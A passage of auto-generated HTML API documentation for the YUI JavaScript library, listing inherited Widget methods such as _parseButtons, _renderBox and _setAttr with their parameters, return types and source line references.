<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The event facade for the DOM focus event</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__parseButtons" class="method item protected inherited">
<h3 class="name"><code>_parseButtons</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>srcNode</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type">Null | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__parseButtons">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l806"><code>widget-buttons/js/widget-buttons.js:806</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p><code>HTML_PARSER</code> implementation for the <code>buttons</code> attribute.</p>
<p><strong>Note:</strong> To determine a button node's name its <code>data-name</code> and <code>name</code>
attributes are examined. Whether the button should be the default is
determined by its <code>data-default</code> attribute.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">srcNode</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>This widget's srcNode to search for buttons.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type">Null | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
<code>buttons</code> Config object parsed from this widget's DOM.
</div>
</div>
</div>
<div id="method__parseStdModHTML" class="method item private inherited">
<h3 class="name"><code>_parseStdModHTML</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>section</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__parseStdModHTML">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l611"><code>widget-stdmod/js/Widget-StdMod.js:611</code></a>
</p>
</div>
<div class="description">
<p>Utility method, used by WidgetStdMods HTML_PARSER implementation
to extract data for each section from markup.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">section</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>:
Inner HTML string with the contents of the section
</div>
</div>
</div>
<div id="method__parseType" class="method item private inherited">
<h3 class="name"><code>_parseType</code></h3>
<span class="paren">()</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method__parseType">EventTarget</a>:
<a href="../files/event-custom_js_event-target.js.html#l52"><code>event-custom/js/event-target.js:52</code></a>
</p>
</div>
<div class="description">
<p>Returns an array with the detach key (if provided),
and the prefixed event name from _getType
Y.on('detachcategory| menu:click', fn)</p>
</div>
</div>
<div id="method__parseZIndex" class="method item protected inherited">
<h3 class="name"><code>_parseZIndex</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>srcNode</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type">Mixed</span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#method__parseZIndex">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l183"><code>widget-stack/js/Widget-Stack.js:183</code></a>
</p>
</div>
<div class="description">
<p>Parses a <code>zIndex</code> attribute value from this widget's <code>srcNode</code>.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">srcNode</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>The node to parse a <code>zIndex</code> value from.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type">Mixed</span>:
The parsed <code>zIndex</code> value.
</div>
</div>
</div>
<div id="method__preInitEventCfg" class="method item private inherited">
<h3 class="name"><code>_preInitEventCfg</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>config</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Base.html#method__preInitEventCfg">Base</a>:
<a href="../files/base_js_Base.js.html#l233"><code>base/js/Base.js:233</code></a>
</p>
</div>
<div class="description">
<p>Handles the special on, after and target properties which allow the user to
easily configure on and after listeners as well as bubble targets during
construction, prior to init.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">config</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The user configuration object</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__preventOverlap" class="method item protected inherited">
<h3 class="name"><code>_preventOverlap</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>val</code>
</li>
<li class="arg">
<code>axis</code>
</li>
<li class="arg">
<code>nodeRegion</code>
</li>
<li class="arg">
<code>constrainingRegion</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionConstrain.html#method__preventOverlap">WidgetPositionConstrain</a>:
<a href="../files/widget-position-constrain_js_Widget-PositionConstrain.js.html#l208"><code>widget-position-constrain/js/Widget-PositionConstrain.js:208</code></a>
</p>
</div>
<div class="description">
<p>The method which performs the preventOverlap calculations for a given axis ("x" or "y") based
on the value and regions provided.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">val</code>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="param-description">
<p>The value being constrain</p>
</div>
</li>
<li class="param">
<code class="param-name">axis</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The axis to being constrained</p>
</div>
</li>
<li class="param">
<code class="param-name">nodeRegion</code>
<span class="type">Region</span>
<div class="param-description">
<p>The region of the node being constrained</p>
</div>
</li>
<li class="param">
<code class="param-name">constrainingRegion</code>
<span class="type">Region</span>
<div class="param-description">
<p>The region of the node (or viewport) we need to constrain to</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>:
The constrained value
</div>
</div>
</div>
<div id="method__protectAttrs" class="method item protected inherited">
<h3 class="name"><code>_protectAttrs</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>attrs</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeCore.html#method__protectAttrs">AttributeCore</a>:
<a href="../files/attribute_js_AttributeCore.js.html#l787"><code>attribute/js/AttributeCore.js:787</code></a>
</p>
</div>
<div class="description">
<p>Utility method to protect an attribute configuration
hash, by merging the entire object and the individual
attr config objects.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">attrs</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>A hash of attribute to configuration object pairs.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
A protected version of the attrs argument.
</div>
</div>
</div>
<div id="method__removeLoadingClassNames" class="method item protected inherited">
<h3 class="name"><code>_removeLoadingClassNames</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__removeLoadingClassNames">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l860"><code>widget/js/Widget.js:860</code></a>
</p>
</div>
<div class="description">
<p>Removes class names representative of the widget's loading state from
the boundingBox.</p>
</div>
</div>
<div id="method__renderBox" class="method item private inherited">
<h3 class="name"><code>_renderBox</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>parentNode</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__renderBox">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l708"><code>widget/js/Widget.js:708</code></a>
</p>
</div>
<div class="description">
<p>Helper method to collect the boundingBox and contentBox and append to the provided parentNode, if not
already a child. The owner document of the boundingBox, or the owner document of the contentBox will be used
as the document into which the Widget is rendered if a parentNode is node is not provided. If both the boundingBox and
the contentBox are not currently in the document, and no parentNode is provided, the widget will be rendered
to the current document's body.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">parentNode</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>The parentNode to render the widget to. If not provided, and both the boundingBox and
the contentBox are not currently in the document, the widget will be rendered to the current document's body.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__renderBoxClassNames" class="method item protected inherited">
<h3 class="name"><code>_renderBoxClassNames</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__renderBoxClassNames">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l836"><code>widget/js/Widget.js:836</code></a>
</p>
</div>
<div class="description">
<p>Applies standard class names to the boundingBox and contentBox</p>
</div>
</div>
<div id="method__renderShim" class="method item private inherited">
<h3 class="name"><code>_renderShim</code></h3>
<span class="paren">()</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#method__renderShim">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l368"><code>widget-stack/js/Widget-Stack.js:368</code></a>
</p>
</div>
<div class="description">
<p>Creates the shim element and adds it to the DOM</p>
</div>
</div>
<div id="method__renderShimDeferred" class="method item private inherited">
<h3 class="name"><code>_renderShimDeferred</code></h3>
<span class="paren">()</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#method__renderShimDeferred">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l301"><code>widget-stack/js/Widget-Stack.js:301</code></a>
</p>
</div>
<div class="description">
<p>Sets up change handlers for the visible attribute, to defer shim creation/rendering
until the Widget is made visible.</p>
</div>
</div>
<div id="method__renderStdMod" class="method item protected inherited">
<h3 class="name"><code>_renderStdMod</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>section</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__renderStdMod">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l466"><code>widget-stdmod/js/Widget-StdMod.js:466</code></a>
</p>
</div>
<div class="description">
<p>Creates the DOM node for the given section, and inserts it into the correct location in the contentBox.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">section</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The section to create/render. Either WidgetStdMod.HEADER, WidgetStdMod.BODY or WidgetStdMod.FOOTER.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>:
A reference to the added section node
</div>
</div>
</div>
<div id="method__renderUI" class="method item protected inherited">
<h3 class="name"><code>_renderUI</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__renderUI">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l825"><code>widget/js/Widget.js:825</code></a>
</p>
</div>
<div class="description">
<p>Initializes the UI state for the Widget's bounding/content boxes.</p>
</div>
</div>
<div id="method__renderUIModal" class="method item protected inherited">
<h3 class="name"><code>_renderUIModal</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#method__renderUIModal">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l198"><code>widget-modality/js/Widget-Modality.js:198</code></a>
</p>
</div>
<div class="description">
<p>Adds modal class to the bounding box of the widget</p>
<p>
This method in invoked after renderUI is invoked for the Widget class
using YUI's aop infrastructure.
</p>
</div>
</div>
<div id="method__renderUIPosition" class="method item protected inherited">
<h3 class="name"><code>_renderUIPosition</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPosition.html#method__renderUIPosition">WidgetPosition</a>:
<a href="../files/widget-position_js_Widget-Position.js.html#l113"><code>widget-position/js/Widget-Position.js:113</code></a>
</p>
</div>
<div class="description">
<p>Creates/Initializes the DOM to support xy page positioning.</p>
<p>
This method in invoked after renderUI is invoked for the Widget class
using YUI's aop infrastructure.
</p>
</div>
</div>
<div id="method__renderUIStack" class="method item protected inherited">
<h3 class="name"><code>_renderUIStack</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#method__renderUIStack">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l170"><code>widget-stack/js/Widget-Stack.js:170</code></a>
</p>
</div>
<div class="description">
<p>Creates/Initializes the DOM to support stackability.</p>
<p>
This method in invoked after renderUI is invoked for the Widget class
using YUI's aop infrastructure.
</p>
</div>
</div>
<div id="method__renderUIStdMod" class="method item protected inherited">
<h3 class="name"><code>_renderUIStdMod</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__renderUIStdMod">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l284"><code>widget-stdmod/js/Widget-StdMod.js:284</code></a>
</p>
</div>
<div class="description">
<p>Creates/Initializes the DOM for standard module support.</p>
<p>
This method is invoked after renderUI is invoked for the Widget class
using YUI's aop infrastructure.
</p>
</div>
</div>
<div id="method__repositionMask" class="method item inherited">
<h3 class="name"><code>_repositionMask</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>nextElem</code>
</li>
</ul><span class="paren">)</span>
</div>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#method__repositionMask">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l489"><code>widget-modality/js/Widget-Modality.js:489</code></a>
</p>
</div>
<div class="description">
<p>Repositions the mask in the DOM for nested modality cases.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">nextElem</code>
<span class="type"><a href="../classes/Widget.html" class="crosslink">Widget</a></span>
<div class="param-description">
<p>The Y.Widget instance that will be visible in the stack once the current widget is closed.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__resyncMask" class="method item private inherited">
<h3 class="name"><code>_resyncMask</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>nextElem</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#method__resyncMask">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l523"><code>widget-modality/js/Widget-Modality.js:523</code></a>
</p>
</div>
<div class="description">
<p>Resyncs the mask in the viewport for browsers that don't support fixed positioning</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">nextElem</code>
<span class="type">Y.Widget</span>
<div class="param-description">
<p>The Y.Widget instance that will be visible in the stack once the current widget is closed.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__set" class="method item protected inherited">
<h3 class="name"><code>_set</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>name</code>
</li>
<li class="arg">
<code>val</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag protected">protected</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeEvents.html#method__set">
AttributeEvents
</a>
but overwritten in
<a href="../files/attribute_js_AttributeCore.js.html#l346"><code>attribute/js/AttributeCore.js:346</code></a>
</p>
</div>
<div class="description">
<p>Allows setting of readOnly/writeOnce attributes. See <a href="#method_set">set</a> for argument details.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">name</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the attribute.</p>
</div>
</li>
<li class="param">
<code class="param-name">val</code>
<span class="type">Any</span>
<div class="param-description">
<p>The value to set the attribute to.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
A reference to the host object.
</div>
</div>
</div>
<div id="method__setAlignCenter" class="method item protected inherited">
<h3 class="name"><code>_setAlignCenter</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>val</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a> | <a href="../classes/Node.html" class="crosslink">Node</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionAlign.html#method__setAlignCenter">WidgetPositionAlign</a>:
<a href="../files/widget-position-align_js_Widget-PositionAlign.js.html#l327"><code>widget-position-align/js/Widget-PositionAlign.js:327</code></a>
</p>
</div>
<div class="description">
<p>Default setter for <code>center</code> Attribute changes. Sets up the appropriate
value, and passes it through the to the align attribute.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">val</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a> | <a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>The Attribute value being set.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a> | <a href="../classes/Node.html" class="crosslink">Node</a></span>:
the value passed in.
</div>
</div>
</div>
<div id="method__setAttr" class="method item protected inherited">
<h3 class="name"><code>_setAttr</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>name</code>
</li>
<li class="arg">
<code>value</code>
</li>
<li class="arg">
<code>opts</code>
</li>
<li class="arg">
<code>force</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag protected">protected</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeCore.html#method__setAttr">AttributeCore</a>:
<a href="../files/attribute_js_AttributeCore.js.html#l361"><code>attribute/js/AttributeCore.js:361</code></a>
</p>
</div>
<div class="description">
<p>Provides the common implementation for the public set and protected _set methods.</p>
<p>See <a href="#method_set">set</a> for argument details.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">name</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the attribute.</p>
</div>
</li>
<li class="param">
<code class="param-name">value</code>
<span class="type">Any</span>
<div class="param-description">
<p>The value to set the attribute to.</p>
</div>
</li>
<li class="param">
<code class="param-name">opts</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>(Optional) Optional event data to be mixed into
the event facade passed to subscribers of the attribute's change event.
This is currently a hack. There's no real need for the AttributeCore implementation
to support this parameter, but breaking it out into AttributeEvents, results in
additional function hops for the critical path.</p>
</div>
</li>
<li class="param">
<code class="param-name">force</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
<p>If true, allows the caller to set values for
readOnly or writeOnce attributes which have already been set.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
A reference to the host object.
</div>
</div>
</div>
<div id="method__setAttrs" class="method item protected inherited">
<h3 class="name"><code>_setAttrs</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>attrs</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag protected">protected</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeEvents.html#method__setAttrs">
AttributeEvents
</a>
but overwritten in
<a href="../files/attribute_js_AttributeCore.js.html#l647"><code>attribute/js/AttributeCore.js:647</code></a>
</p>
</div>
<div class="description">
<p>Implementation behind the public setAttrs method, to set multiple attribute values.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">attrs</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>An object with attributes name/value pairs.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
A reference to the host object.
</div>
</div>
</div>
<div id="method__setAttrUI" class="method item private inherited">
<h3 class="name"><code>_setAttrUI</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__setAttrUI">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l1199"><code>widget/js/Widget.js:1199</code></a>
</p>
</div>
<div class="description">
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
</div>
<div id="method__setAttrVal" class="method item private inherited">
<h3 class="name"><code>_setAttrVal</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>attrName</code>
</li>
<li class="arg">
<code>subAttrName</code>
</li>
<li class="arg">
<code>prevVal</code>
</li>
<li class="arg">
<code>newVal</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type">Booolean</span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeCore.html#method__setAttrVal">AttributeCore</a>:
<a href="../files/attribute_js_AttributeCore.js.html#l554"><code>attribute/js/AttributeCore.js:554</code></a>
</p>
</div>
<div class="description">
<p>Updates the stored value of the attribute in the privately held State object,
if validation and setter passes.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The attribute name.</p>
</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The sub-attribute name, if setting a sub-attribute property ("x.y.z").</p>
</div>
</li>
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">
<p>The currently stored value of the attribute.</p>
</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">
<p>The value which is going to be stored.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type">Booolean</span>:
true if the new attribute value was stored, false if not.
</div>
</div>
</div>
<div id="method__setBB" class="method item private inherited">
<h3 class="name"><code>_setBB</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>Node/String</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__setBB">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l754"><code>widget/js/Widget.js:754</code></a>
</p>
</div>
<div class="description">
<p>Setter for the boundingBox attribute</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">Node/String</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
Node
</div>
</div>
</div>
<div id="method__setBox" class="method item private inherited">
<h3 class="name"><code>_setBox</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>id</code>
</li>
<li class="arg">
<code>node</code>
</li>
<li class="arg">
<code>template</code>
</li>
<li class="arg">
<code>true</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__setBox">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l791"><code>widget/js/Widget.js:791</code></a>
</p>
</div>
<div class="description">
<p>Helper method to set the bounding/content box, or create it from
the provided template if not found.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">id</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The node's id attribute</p>
</div>
</li>
<li class="param">
<code class="param-name">node</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The node reference</p>
</div>
</li>
<li class="param">
<code class="param-name">template</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>HTML string template for the node</p>
</div>
</li>
<li class="param">
<code class="param-name">true</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
<p>if this is the boundingBox, false if it's the contentBox</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>:
The node
</div>
</div>
</div>
<div id="method__setButtons" class="method item protected inherited">
<h3 class="name"><code>_setButtons</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>config</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
